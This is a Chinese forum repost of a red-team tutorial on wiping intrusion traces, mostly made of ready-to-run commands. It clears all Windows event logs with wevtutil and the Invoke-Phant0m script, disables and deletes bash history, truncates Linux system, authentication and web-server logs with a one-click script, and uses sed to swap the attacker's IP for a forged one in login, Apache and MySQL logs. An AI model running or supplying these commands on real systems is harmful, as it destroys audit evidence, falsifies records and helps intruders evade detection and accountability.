红队痕迹清理之入侵日志处理

Delina · 发表于 2021-12-17 13:27:40

原文链接：红队痕迹清理之入侵日志处理

前言
在攻击结束后，如何不留痕迹的清除日志和操作记录，以掩盖入侵踪迹，这其实是一个细致的技术活。在蓝队的溯源中，攻击者的攻击路径都将记录在日志中，所遗留的工具也会被蓝队进行分析，在工具中可以查找特征，红队自研工具更容易留下蛛丝马迹。你所做的每一个操作，都要被抹掉；你所上传的工具，都应该被安全地删掉，以防被溯源在演练中失分。
Windows日志处理
Windows事件日志不同EVENT ID代表的不同意义

Windows日志管理工具wevtutil.exe
wevtutil搭配for循环清除所有日志

for /F "tokens=*" %a in ('wevtutil.exe el') DO wevtutil.exe cl "%a"

Powershell批量删日志

wevtutil el | Foreach-Object {Write-Host "Clearing $_"; wevtutil cl "$_"}

加载运行powershell脚本删除日志
powershell –exec bypass –Command "& {Import-Module 'C:\Invoke-Phant0m.ps1';Invoke-Phant0m}"
github地址：https://github.com/gouduyao/Invoke-Phant0m

Linux日志处理

Bash日志处理

bash去掉history记录，让系统不记录历史操作命令（使用较少）
export HISTSIZE=0
export HISTFILE=/dev/nullhistory命令的清除
history -c # 删除内存中的所有命令历史
history -r # 删除当前会话历史记录

系统日志

一键清理日志bash脚本

# !/usr/bin/bash
echo > /var/log/syslog
echo > /var/log/messages
echo > /var/log/httpd/access_log
echo > /var/log/httpd/error_log
echo > /var/log/xferlog
echo > /var/log/secure
echo > /var/log/auth.log
echo > /var/log/user.log
echo > /var/log/wtmp
echo > /var/log/lastlog
echo > /var/log/btmp
echo > /var/run/utmp
rm ~/./bash_history
history -c

复制代码

使用sed伪造日志或定向删除

# 192.168.100.101为攻击者IP，10.0.0.55为伪造IP，-i编辑文件
sed 's/192.168.100.101/10.0.0.55/g' -i /var/log/btmp*
sed 's/192.168.100.101/10.0.0.55/g' -i /var/log/lastlog
sed 's/192.168.100.101/10.0.0.55/g' -i /var/log/wtmp
sed 's/192.168.100.101/10.0.0.55/g' -i secure
sed 's/192.168.100.101/10.0.0.55/g' -i /var/log/utmp

复制代码

由于日志文件偏多这里建议如上编辑为bash脚本一键清理web日志同样可以使用sed进行伪造，例如apache日志、MySQL日志、php日志

sed 's/192.168.100.101/10.0.0.55/g' –i /var/log/apache/access.log
sed 's/192.168.100.101/10.0.0.55/g' –i /var/log/apache/error_log
sed 's/192.168.100.101/10.0.0.55/g' –i /var/log/mysql/mysql_error.log
sed 's/192.168.100.101/10.0.0.55/g' –i /var/log/mysql/mysql_slow.log
sed 's/192.168.100.101/192.168.1.4/g' –i /var/log/apache/php_error.log

复制代码

		自动登录	找回密码
密码			立即注册